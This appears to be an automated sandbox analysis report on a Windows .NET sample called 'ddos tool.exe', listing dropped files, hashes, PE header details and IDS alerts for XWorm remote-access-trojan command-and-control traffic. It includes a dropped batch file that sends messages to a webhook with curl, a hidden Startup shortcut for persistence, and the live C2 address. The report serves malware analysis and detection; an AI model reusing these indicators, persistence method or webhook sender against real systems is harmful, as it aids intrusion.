                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnrtunvz.eud.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgntuhyf.sgv.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmyovr1b.jck.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lx1fgpta.qrb.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxaml5ee.d2l.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxbxneik.2g4.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtnd43vo.p4r.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se2r3k0j.cut.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sloywyja.cd5.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uemv0yfs.m2b.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yausz5ap.bn5.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypplx2lb.ex2.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\lil bot.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\ddos tool.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):201
                                                          Entropy (8bit):4.8750281851864505
                                                          Encrypted:false
                                                          SSDEEP:6:/yJK7OLOmq+sXy8JAwGVl1Bq/m/xkeeKqRjWOG9:/aK7OLOmqy5wmkyWeeKqRq3
                                                          MD5:BE7D9F4D62714B425956A909E607EF91
                                                          SHA1:BF46F93281DE8A5C980F75DAFC530E34EFCE4BDA
                                                          SHA-256:98F450D4DAAF023A911A561C2F82E915A44EE2F13D7BB1761A3DE4FC494FCAB4
                                                          SHA-512:6FDC94D7FFD159EBCBF49368F3C6FEFC63B2BEF77ACF03E8C31E5F986A4CEA05DBBED8354E9C9732E705DFB50527E52E2FA70E9C9E1AA6CC92A95C56169B9744
                                                          Malicious:false
                                                          Preview:@Echo off..color e..set /p webhook=Webhook : ..:send..cls..set /p message=Message : ..curl -X POST -H "Content-type: application/json" --data "{\"content\": \"%message%\"}" %webhook%..goto :send..pause

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\Teams.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jan 3 20:20:49 2025, mtime=Fri Jan 3 20:20:49 2025, atime=Fri Jan 3 20:20:49 2025, length=191488, window=hide
                                                          Category:dropped
                                                          Size (bytes):1070
                                                          Entropy (8bit):4.985043016401345
                                                          Encrypted:false
                                                          SSDEEP:24:8efz9f8atqBRUgKjDJpdACBce0at4w3qygm:8ehEvRGD2Cjgyg
                                                          MD5:D659349904013F357CA12EDBFA83BBF8
                                                          SHA1:718D5903BFF7EAE4A4B97E289CB0DE34E9A30899
                                                          SHA-256:843197387E3B4D61ED5F98E7315464646381C988CEB4ABD9345BDB2A6022513A
                                                          SHA-512:F4D5ADD9CA45D233AFDB2260703565C380DADCE7693FA58B88908C54F6D01E91B8CDBD424FE48F4B3AAC9F1D5DF2A1C235161B3AABAD502CF3B8F6A2760854C3
                                                          Malicious:false
                                                          Preview:L..................F.... ...\1i\%^..\1i\%^..\1i\%^............................:..DG..Yr?.D..U..k0.&...&...... M.......t7%^..T.~\%^......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl#Zz.....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....#Zx...Local.<......DWSl#Zz.....V.......................O.L.o.c.a.l.....N.1.....#Z....Temp..:......DWSl#Z......\.........................T.e.m.p.....j.2.....#Z.. .SYSTEM~1.DLL..N......#Z..#Z......[)......................O.S.y.s.t.e.m.U.s.e.r...d.l.l.......`...............-......._...........=........C:\Users\user\AppData\Local\Temp\SystemUser.dll..+.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.y.s.t.e.m.U.s.e.r...d.l.l.............:...........|....I.J.H..K..:...`.......X.......124406...........hT..CrF.f4... ..g......,...W..hT..CrF.f4... ..g......,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3....

                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.7027977908427
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:ddos tool.exe
                                                          File size:204'288 bytes
                                                          MD5:a5644dc7298b5bd632f3656816fff5ed
                                                          SHA1:64a165e790724d9c9d5c221db96d72a61cbe8f4d
                                                          SHA256:48b2dcdf48cda77f19d3713f86b0dbb7dd0bf71399b77c5745368f9945bdac0e
                                                          SHA512:e4729bfc8dcf5aa6a5f245c74f6e3af493c767dc18ad6112018b5f50712a201fa023118933df88888be1b04bf33079839db9fc99a7d8ad98eacf2c25a6a15efe
                                                          SSDEEP:3072:TKL9s4iPFm4NBX6yXgveVAFAdqP8M94s53joBnBMQiWtNI4R7pISS:O91iPyWV6A4Fd5zoBnBPiWtNIU7pL
                                                          TLSH:D214FBAC44F77176B96ECE2C9D7A78C89938E1BDD92E482D1306E419C536F2B09DB034
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug............................~3... ...@....@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x43337e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6775D589 [Wed Jan 1 23:53:45 2025 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3332c0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x4c6.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x313840x31400aeaa8ccee621c28fdfe93e35ea468696False0.6331991592639594data7.716429359319973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x340000x4c60x60068a286207ef31956d80e4adbc768eea6False0.373046875data3.702878868473553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x360000xc0x2008bc59ebe806a438f6ce4eda02f3e866fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x340a00x23cdata0.4737762237762238
                                                          RT_MANIFEST0x342dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-03T22:21:02.664509+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.549941147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.024636+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound1147.185.221.2457012192.168.2.549941TCP
                                                          2025-01-03T22:21:03.382141+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.382141+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.523155+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.523155+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.685455+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.685455+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.872592+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.872592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.975438+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:03.975438+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.084511+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.084511+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.193679+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.193679+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.303060+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.303060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.412583+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.412583+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.524277+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.524277+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.631208+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.631208+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.740468+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.740468+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.850000+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.850000+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.959196+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:04.959196+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.068790+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.068790+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.178012+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
